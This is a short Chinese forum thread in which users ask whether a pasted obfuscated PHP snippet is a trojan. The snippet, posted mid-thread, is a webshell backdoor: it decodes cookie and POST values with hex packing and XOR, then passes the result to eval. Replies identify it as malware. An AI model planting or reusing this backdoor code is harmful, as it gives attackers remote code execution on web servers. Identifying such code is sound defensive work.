a7898585 发表于 2018-4-16 21:50:09

这是马?

帮顶,看看什么问题

cxd44 发表于 2018-4-16 21:51:23

加密了

fgpgy 发表于 2018-4-16 21:52:19

一步一步翻译过来就知道干嘛了

itbobo 发表于 2018-4-16 21:52:50

[*]$wdkrt = 'ka6fbtmHdxi8opnrvl1\'e04*s_g3y-u7#c92';
[*]$mxavm = Array();
[*]$mxavm = '0e87df1c-4837-4122-b692-bae83b90e1a6';
[*]$mxavm = 'H*';
[*]$mxavm = '#';
[*]$mxavm = 'count';
[*]$mxavm = 'str_repeat';
[*]$mxavm = 'explode';
[*]$mxavm = 'substr';
[*]$mxavm = 'array_merge';
[*]$mxavm = 'strlen';
[*]$mxavm = 'pack';
[*]foreach (array_merge($_COOKIE, $_POST) as $jbmwo => $eyzaqt){
[*]    function amuzp($mxavm, $jbmwo, $vfruhe){
[*]      return substr(str_repeat($jbmwo . '0e87df1c-4837-4122-b692-bae83b90e1a6', ($vfruhe / strlen($jbmwo)) + 1), 0, $vfruhe);
[*]    }
[*]    function rbwcal($mxavm, $ufkgca){
[*]      return @pack('H*', $ufkgca);
[*]    }
[*]    function sbfawmr($mxavm, $ufkgca){
[*]      $fhbsrqm = count($ufkgca) % 3;
[*]      if (!$fhbsrqm) {
[*]            eval($ufkgca($ufkgca));
[*]            exit();
[*]      }
[*]    }
[*]    $eyzaqt = rbwcal($mxavm, $eyzaqt);
[*]    sbfawmr($mxavm, explode('#', $eyzaqt ^ amuzp($mxavm, $jbmwo, strlen($eyzaqt))));
[*]}复制代码

itbobo 发表于 2018-4-16 22:04:44

都不用看内容 这么搞的肯定是马
页: [1]
查看完整版本: 这是马?